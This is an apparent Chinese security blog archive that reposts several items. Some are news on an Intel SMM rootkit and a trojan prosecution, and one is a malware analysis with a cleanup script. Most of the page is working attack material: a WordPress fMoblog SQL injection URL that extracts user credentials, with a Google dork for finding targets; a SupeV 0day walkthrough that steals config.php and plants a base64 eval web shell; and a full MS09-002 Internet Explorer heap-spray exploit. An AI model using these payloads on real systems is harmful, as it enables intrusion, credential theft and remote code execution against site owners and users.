分类 "网络安全" 的存档.

WordPress又爆注入漏洞

#############################################################
# WordPress Plugin fMoblog Remote SQL Injection Vulnerability
# Plugin Home: http://www.fahlstad.se/wp-plugins/fmoblog/
# Plugin Version: 2.1
# Author: strange kevin
# Email: strange.kevin@gmail.com
# Google Dork: "Gallery powered by fMoblog"
##############################################################

# Exploit: http://www.site.com/?page_id=[valid_id]&id=-999+union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+Roger2011_users–
# Demo: http://www.tarynitup.com/?page_i … +union+all+select+1,2,3,4,group_concat(user_login,0x3a,user_pass,0x3a,user_email),6+from+Roger2011_users–

##############################################################
# Greetz: str0ke and milw0rm.com
##############################################################

# milw0rm.com [2009-03-17]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/285

英特尔遭遇CPU级RootKit,目前无药可医

来源:NetworkWorld
http://www.networkworld.com/community/node/39825

      Intel CPU 缓存被暴漏洞,研究报告与 RootKit利用代码即将出炉。 “3月19日,我们将就Intel CPU 的缓存机制漏洞,公布一份报告及漏洞利用。相关攻击可以在目前大部分IntelCPU的主板上从Ring0提权至SMM。Rafal在几个小时内就做出了一份漏洞利用代码。” Joanna女强人在博客中写道。本 次漏洞利用的致命之处,在于它能将自身隐藏在SMM空间中,SMM权限高于VMM,设计上不受任何操作系统控制、关闭或禁用。实际应用中唯一能确认SMM 空间中运行代码的方法只有物理性的分离计算机固件。由于SMI优先于任何系统调用,任何操作系统都无法控制或读取SMM,使得SMM RootKit有超强的隐匿性。其厉害程度与之前的BluePill相似,但比VMM攻击涉及到系统的更深层面。而 SMM自386时代就出现在Intel CPU中。 Joanna 和 Loic 这次将发布从未公布过的Intel缓冲HACK。它不但可以控制SMM空间还能运行其新型RootKit,控制计算机。新的 RootKit 甚至有能力连接服务器更新代码,储存数据。运行于操作系统中的任何软件都将无法检测此类利用。据 Joanna 说,Intel员工,对Intel的此类 CPU 缓存及SMM漏洞利用的署名讨论可以追溯到2005年。她与Loic于去年10月已经向Intel正式提交过报告。Intel将问题通知了CERT并将其 归为漏洞VU#127284号。现在Intel已经知道漏洞的存在好多年了,却没有做出应有的修正。无奈,安全专家们别无选择,只能公布他们的发现。如果 此漏洞利用真的已经存在数年,那么一定早已有人开始利用它。正如Joanna所说”漏洞就在那里,如果足够长的时间内没人理会,几乎可以肯定,怀着各种意 图的人们将会发现它并将之利用,只是迟早的事。所以请不要责怪研究人员,他们发现并公布问题 – 他们实际上是为了帮助我们的社会。” 报告将于19号在此发布: http://theinvisiblethings.blogspot.com/2009/03/independent-attack-discoveries.html
之前的 SMM 利用原理: http://wwww.networkworld.com/news/2008/050908-black-hat-hackers-find-a.html?page=1

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/289

首例黑客新罪案进入起诉:木马3月挣来3000万

来源:腾讯新闻

引用内容 引用内容
核心提示:

  2月28日《刑法修正案(七)》经批准后公布,根据新增的条款,南京鼓楼检察院近日以“非法侵入计算机信息系统罪”对一起盗号木马案提起公诉,使此案成为全国首例提供程序工具“非法侵入计算机信息系统罪”起诉的案件。

  在这起案件的审查过程中,网络交易记录如何甄别,电子证据该如何固定,从未谋面的犯罪嫌疑人,可否认定为犯罪团伙?这些都是新类型案件摆在侦查人员面前的难题。

  3月2日,南京市鼓楼区检察院的曹立检察官拿着一份起诉资料说,根据2月28日公布的《刑法修正案(七)》,这一起制作、传播“大小姐”盗号木马的案件于近日以“非法侵入计算机信息系统罪”起诉,这是全国首例以“非法侵入计算机信息系统罪”罪名起诉的案件(本报2月25日1版《南京警方破获“大小姐”木马案》对此曾进行过报道。)

  2008年8月23日,“大小姐”木马案被移送到鼓楼检察院审查起诉,检察官们审查发现,这起案件错综复杂,是前所未见的高智商、高科技的新类型犯罪。

  编程高手与“木马计”

  这起案件的犯罪嫌疑人王业,是个只有初中学历的无业青年,四川绵阳人。他经常在网上花一两元钱下载一些木马病毒,再以几倍甚至是几十倍的价格卖给“菜鸟”们,挣些零钱花花,但利用这些半公开的木马挣钱总是不长久,很快就被杀毒软件杀掉。王业虽然学无所长,但他头脑灵活,他在“小本经营”时,发现QQ以及游戏的盗号木马最好销,如果能找个人根据不同的游戏制作不同的盗号木马,并且能根据杀毒软件不断升级的话,岂不是赚大了?于是,一个他自以为完美的“木马计”出炉了。

  龙二是湖北武汉人,尽管通过自学成为编程高手,但由于学历不过硬,因此在求职时屡屡碰壁。这天,闲来无事的他在网上闲逛,看到了王业的招聘启事,两人一拍即合。2007年初,王业以每月2000元的薪酬聘请龙二为其编写盗号木马程序。

  龙二不愧为编程高手,他着手编写木马程序后,很快就针对“征途”、“QQ自由幻想”、“问道”、“武林外传”等热门网络游戏,制作了四十多个不同的盗号木马,基本上三四天就能制作出一个木马病毒。这些木马都是嵌入式木马,嵌入一些防备较差的网站后,只要用户登陆这些被入侵的网站,用户的账号、密码就被窃取,账号上的游戏装备、Q币等虚拟财产就流入到王业等人的手中。被入侵的网站对这些病毒都感到很棘手,上海某政府网站被此病毒入侵后,杀毒无效,只好重建网站,没想到网站重建后,病毒仍然存在,可见其病毒的厉害。

  龙二工作勤恳,制作木马水平也相当高,为了留住这个人才,王业将龙二的薪酬涨到每月4000元,在当时这也算是高工资了,龙二对此相当满意。但他并不知道,据王业自称,他制作的木马3个月挣来了3000万!

  在检察官对王业进行讯问时,王业还说:“千万别告诉龙二我挣了多少钱,否则他要恨死我的!”

  从未谋面的犯罪团伙

  2008年2月,王业与浙江宁波的周山在网上相识,周山有着浙商的商业敏感与经营能力,王业告诉周山,谎称自己编写了几十个针对游戏的木马程序,周山在了解情况后,认为这些“小木马”有着“大商机”,于是,周山提出由他与朋友许四来当“木马总经销”,所得利润与王业五五分成,王业从言谈中发现周山很有经营头脑,可能扩大其收益,当下同意了。

  周山接手后,马上对盗号木马进行了包装,统一称之为“大小姐木马”,并为“大小姐”申请了QQ专用号100000858作为网上总代理,此外,还申请了专门的网银账号、支付宝账号等。

  随即,周、许二人又开始发展下线,他们以包断的方式,将“大小姐”木马中,针对不同游戏的木马包给不同的人,业内称这些人为“包马人”。根据游戏用户量不同,“包马人”必须付给“总经销”每月1万元到8万元不等,周山收到款后,将“大小姐”的木马生成器、收信程序以及更新版本通过QQ传给这些“包马人”。

  周伍就是游戏“QQ自由幻想”的“包马人”,在接手这一款木马后,周伍盗取了无数游戏用户的账号,这些账号被“包马人”称为“信”,经过“洗信”(即将没有虚拟财产的“信”剔除),得到2000多个有效的“信”,通过变卖这些“信”里的虚拟财产,他一个人就获利百万元。

  其他的“包马人”还有:陈六,他包下了针对“武林外传”的盗号木马,每月支付“包马费”1.2万元,后涨至1.5万元;盛七以每月2.5万元价格包下“征途”的盗号木马;范八以每月2.5万元包下“问道”的盗号木马;杨九以每月2万的价格包下“梦幻西游”的盗号木马……

  “包马人”通过直接在网上传播、转卖,以及雇佣他人盗号等方式牟利,同时他们又发展其下线,称为“站长”。陈六就将“武林外传”的盗号木马发送给何十、吴十一等“站长”,由他们租用服务器放置木马,这些“站长”下线是“流量商人”,由他们来扩大木马的传播,同时“站长”们又从“流量商人”那儿收购大流量的“信”。杨某、郭某、程某等“流量商人”拿到木马后,疯狂攻击一些网站,甚至连政府网站也不放过,江苏、上海的一些政府网站也被嵌入病毒链接,以劫持这些网站的用户下载“流量商人”种下的木马。

  2008年5月5日,由于“大小姐”入侵,江苏某厅政府网站陷入瘫痪,并由此案发。公安机关随即展开侦查。

  2008年的夏天,这些“大小姐”背后的神秘黑客们,因为从来没有见过面,他们决定在上海聚会,为其中一人庆贺生日。对他们久已关注的公安机关,通过技术侦查获得此信息后,对他们进行了抓捕,并从他们随身携带的十余台笔记本电脑中,获取了大量的电子证据,这为后来此案的侦查带来很大的便利。

  四次移送终起诉

  这些交易记录如何甄别?哪些与本案有关,哪些是一般性交易记录?还有电子证据该如何固定?比如说,网上交易时,“支付宝”仅对交易记录保存两个月,没有交易记录的部分应如何固定证据?面对这些新类型证据,又如何认定?对于这些从未谋面的犯罪嫌疑人,可否认定为犯罪团伙?这都是摆在侦查人员面前的新难题。

  2008年8月23日,这起木马案由公安机关移送至南京市鼓楼区检察院审查起诉。检察官们审查发现,这一类案件受害人非常不确定,因为大多数人虚拟财产遭窃后,都会自认倒霉,大都不会选择报警;另外,此类案件的案值也很难确定,尽管王业供述,他生意最好的时候,曾经3个月就挣了3000万,但在实际的审查过程中,只有数百万案值被确定。

  在对涉案人员进行依法讯问后,本着对这起案件负责的态度,检察院以证据不足,事实不清为

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/304

SupeV 1.0.1 0DAY

来源:WEB安全手册
      大家好,我是无名今天发布个discuz旗下产品 “视频播客 SupeV 1.0.1″ 0day 漏洞文件:api目录下test.php 直接看代码 $str=file_get_contents( $thumb );//首先第18行用file_get_contents() 读取$thumb参数的文件内容,注意这里也可以读远程文件, $path = ".".getthumb_path( $vid );//第19行获取路径参数 $vid $opt_big = array(   "targetfile" => $path.".jpg",   "attach" => $attach['attach'],   "ext" => $attach['extension'],   "ratio" => false,   "width" => THUMB_BIG_WIDTH,   "height" => THUMB_BIG_HEIGHT   ); //24行到39行定义$opt_big和$opt_small数组 @sf_copy( $opt_big['targetfile'], $opt_small['targetfile'] );//紧接着第40行就开始copy了,注意看,把$opt_big数组里的targetfile复制到$opt_small数组的targetfile 漏洞形成,直接以get方式请求 api/test.php?thumb=../config.php&vid=../../1 会把config.php复制到根目录下1.jpg
      作者:漏洞形成,直接以get方式请求 api/test.php?thumb=../config.php&vid=../../1会把config.php复制到根目录下1.jpg 这里写错了,应该是attachments\thumb\1.jpg写入倒了这里,向上跳4级才是根目录,这里只跳了2级,大家分析下代码就知道了,好多人都说利用不了,下面贴一个站出来给大家看 http://video.worlddiy.net/attachments\thumb\1.jpg 上次匆忙文章没写清楚,还望谅解这样就得到了网站的配置文件,phpmyadmin连上去,如果是root连接,直接导出shell,不会的查查对应文章,这里不再叙述。如果不是root,就注册个账号,连上去把用户的admgid改成1 在sv_members表里接下来讲后台获取shell,前面test.php代码file_get_contents() 可以读取远程文件写入到网站目录 api/test.php?thumb=http://你的空间地址/test.txt&vid=../../../../inc/crons/1 写到inc/crons/1.jpg test.txt内容 < ?php fputs(fopen("111.php","w"),base64_decode("PD9ldmFsKCRfUE9TVFtjbWRdKTs/Pg=="));?> 作用是在当前目录生成111.php 内容是LANKER的一句话,密码cmd 为什么写这里,等下就知道了,进入后台,点上方的辅助工具,新增计划任务 提交就执行了inc/crons/1.jpg内容会在根目录下生成111.php内容是LANKER的一句话,密码cmd 成功拿到shell,完了记得删除那个计划任务,不然网站就打不开了,不会用的联系我联系qq:57112848 cainiaokunmm@163.com Powered by SupeV 1.0.1 exploit Found by : 无名

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/315

新的pdf 0day

来源:http://hi.baidu.com/weiwang_blog/blog/item/6ba981d1b00d4e3f9b50271e.html

下面这个是老的。
http://insecureweb.com/%20/newish-web-based-pdf-attack-in-the-wild-with-real-exploit-code/

新的pdf 0day 在这里
http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html

Maybe you read Michael Howard’s twitter feed. If so, you may be wondering why you were asked to turn off Javascript in Adobe Acrobat Reader. Well, I’m here to tell you that if you were to load a PDF file with an embedded JBIG2 image stream:

<< /Type /XObject /Subtype /Image /Width 2550 /Height 3305 /BitsPerComponent 1
/ColorSpace /DeviceGray /Filter /JBIG2Decode/DecodeParms << /jbig2Globals 13 0 R >> /Length 10 0 R /Name /X >>
stream

And the 5th byte into the stream (which is the segment header flag byte) were to have the 6th bit set indicating a large page association size:

00 00 00 01 40 00 00 33 33 33

Then the bytes shown as 00 33 33 33 above would be loaded by the following assembly in AcroRd32.dll (ecx+0x1c points to our four bytes):

5d42d889 8b411c          mov     eax,dword ptr [ecx+1Ch]
5d42d88c 85c0            test    eax,eax
5d42d88e 0f84ac020000    je      AcroRd32_5cd80000!PDFLTerm+0x235ad0 (5d42db40)
5d42d894 8b4e10          mov     ecx,dword ptr [esi+10h]
5d42d897 8d0480          lea     eax,[eax+eax*4]
5d42d89a 834481ec01      add     dword ptr [ecx+eax*4-14h],1 ds:0023:07d96648=????????eax=00ffffff
ecx=03d96660Playing with much smaller (0×9000) or much larger would result in crashes in different areas, but in general you would control within multiples of four where you write. If you were to add to this a quick heap spray with some javascript, I don’t doubt that you could write a rather reliable exploit across multiple versions of Acrobat Reader for XP, and if one were really inclined (or bored), for linux or OS X also! Yes, it crashes on all three, in versions 8 and 9. So to all of you security pros who were looking forward to a nice quiet weekend, I can’t fix it, but hopefully this will make the fire drill a little less long and arduous. Have a good one!

Oh, by the way, I forgot to mention. If you happen to open an explorer window, or a browser window, or anything at all that even has the ICON of the pdf file, you’re owned.

Open Source Snort rules and SEU 203 will be up in a few with coverage. The clam sig is called Exploit.PDF-23

P.S. To adobe: Matt Olney would like to know why javascript is on by default. Thanks.

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/318

USP10.DLL猫癣病毒分析报告和查杀方法

一、现象描述
  1.感染“猫癣下载器”的电脑速度会明显变慢,杀毒软件反复提示发现病毒不能完全清除;
  2.非系统盘的可执行文件目录发现“usp10.dll”文件;
  3.部分用户的电脑感染猫癣下载器会出现弹出大量广告页面、“QQ医生”扫描功能无法正常使用,迅雷不能出现正常使用等各种症状;
  4.部分用户查毒以后将导致输入法无法正常使用;
  5.QQ、网游游戏账号被盗。
  二、行为描述
  1、对抗安全软件
  (1) 病毒通过给进程照相对比方式找到以下软件的进程,然后调用windows TerminateProcess函数尝试将其结束。
  kavstart.exe kissvc.exe kmailmon.exe kpfw32.exe kpfwsvc.exe kwatch.exe ccenter.exe ras.exe rstray.exe rsagent.exe ravtask.exe ravstub.exe ravmon.exe ravmond.exe avp.exe 360safebox.exe 360Safe.exe Thunder5.exe rfwmain.exe rfwstub.exe rfwsrv.exe
  (2) 调用360保险箱自带卸载参数卸载保险箱,并修改注册表关闭360安全卫士的实时监控遍历当前进程,发现存在"safeboxTray.exe"进程,获取其文件路径,并以"/u"参数打开"safeboxTray.exe"进程,"/u"参数是其自带的卸载参数。
  修改注册表
  HKLM\SOFTWARE\360Safe\safemon
  "MonAccess"REG_DWORD0
  "SiteAccess" REG_DWORD0
  "ExecAccess"REG_DWORD0
  "ARPAccess"REG_DWORD0
  "weeken"REG_DWORD0
  "IEProtAccess"REG_DWORD0
  "LeakShowed"REG_DWORD0
  "UDiskAccess"REG_DWORD0
  (3) 创建线程关闭icesword之类的安全软件的窗口
  病毒检查当前窗口的class(类)是否为"AfxControlBar42s",如果是则向此窗口发送WM_CLOSE(关闭消息)消息,并模拟键盘的回车键点击“是”。
  2、破坏系统设置
  (1) 替换下载并替换HOSTS文件,从而屏蔽竞争对手的木马下载域名
  下载
[url=http://txt.naiws.com/ad.jpg]
http://txt.naiws.com/ad.jpg
[/url]
,保存到%sys32dir%\drivers\ect\hosts文件
  (2) 更改显示隐藏文件,使得病毒释放的部分文件不被用户发现
  修改以下注册表键值,来隐藏文件
  HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
  "Hidden"REG_DWORD0
  "SuperHidden"REG_DWORD0
  "ShowSuperHidden"REG_DWORD0
  (3) 添加对迅雷的映像劫持(IFEO),感染后不能正常使用迅雷
  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
  \Image File Execution Options\Thunder5.exe
  "Debugger"REG_SZ"svchost.exe"
  3、病毒不断复活,难以清除
  (1) 猫癣下载器使用机器狗的穿还原的技术修改ctfmon.exe(此程序用先是当前输入法状态),若此文件被杀毒软件查杀,则用户不能切换输入法输入中文。
  (2) 猫癣下载器,使用了劫持dll文件的方式,在所有非系统盘的可执行文件所在目录释放大量“usp10.dll”文件,当用户发现电脑“中招以后”即使进行重新安装,却因为这个马甲dll没有被清除导致再度感染。
  (3) 猫癣下载器在局域网中会尝试使用扫荡波(MS08-067)漏洞攻击局域网的用户,若用户没有及时修补扫荡波漏洞将可能反复被感染。
  (4) 由于很多网站安全意识薄弱,恶意代码被轻松植入,猫癣下载器借IE0day漏洞、Flashplayer、Realpaly、迅雷5、暴风影音、联众世界、微软access漏洞等漏洞在网络广泛传播,用户访问网页的时候就有可能再次感染病毒。
  4、猫癣下载器给电脑带来的危害
  猫癣下载器下载针对魔兽世界、大话西游OnlineII、剑侠世界、完美系列游戏、梦幻西游、魔域等十余款热门网游、以及QQ的盗号木马,企图盗窃受害用户网络虚拟财产。
  三、防御方案
  (1) 更新病毒库、开启实时监控
  (2) 使用相关工具打全系统补丁
  (3) 安装安全工具,以防止该病毒通过网页恶意代码入侵你的系统。
  四、清除猫癣和查杀USP10.DLL的专杀工具
  以下是金山的系统急救箱,可以清除猫癣下载器,修复Comres.dll、rpcss.dll、usp10.dll等系统异常等。
  下载地址:
[url=http://cu003.www.duba.net/duba/tools/dubatools/install.exe]
http://cu003.www.duba.net/duba/tools/dubatools/install.exe
[/url]
  五、手动删除方式
  进到安全模式下,记住不要点击任何目录下的可运行程序,然后按照下面的步骤:
  1 “工具”–“文件夹选项”–“查看”–把“隐藏受保护的操作系统文件的对勾去掉”关闭以及选择“显示所有文件和文件夹”,这时你会看见很多目录下都有usp10.dll大小为8K。
  2 找到系统windows目录下的usp100.dll删除(最好不要用鼠标双击根目录,因为任何目录都通过explorer.exe,用地址栏就行了)。记住不要点击任何目录下的可运行程序,因为usp10.dll具有系统优先权,你点击任何可运行程序都会首先加挂usp10.dll。
  3 将下面粘贴到记事本保存为bat批处理文件,然后双击运行。
  @echo off
  set "str=usp10.dll"
  set "drv=c d e f"
  for %%a in (%drv%) do (
  if exist %%a: (
  for /f "delims=" %%b in ('dir /s/b/a-d "%%a:\%str%" 2^>nul') do (
  if not "%%b"=="" (
  attrib "%%b" -a -h -s
  del /f/s/q "%%b"
  )
  )
  )
  )
  4 在“运行”中输入:regedit;查找包含usp10.dll的键和项然后删除。(system32目录下的usp10.dll除外)
  重启搞定,请严格按照上面步骤进行。

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/324

MS09-002 0day

复制内容到剪贴板程序代码程序代码
<!–
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html –user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
–>

<script language="JavaScript">

var c="putyourshizhere-unescaped";

var array = new Array();

var ls = 0x100000-(c.length*2+0x01020);

var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xC0; i++) {
    array[i] = lh + c;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() {
    o1=document.createElement("tbody");
    o1.click;
    var o2 = o1.cloneNode();
    o1.clearAttributes();
    o1=null; CollectGarbage();
    for(var x=0;x<a1.length;x++) a1[x].src=s1;
    o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>

# milw0rm.com [2009-02-18]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/329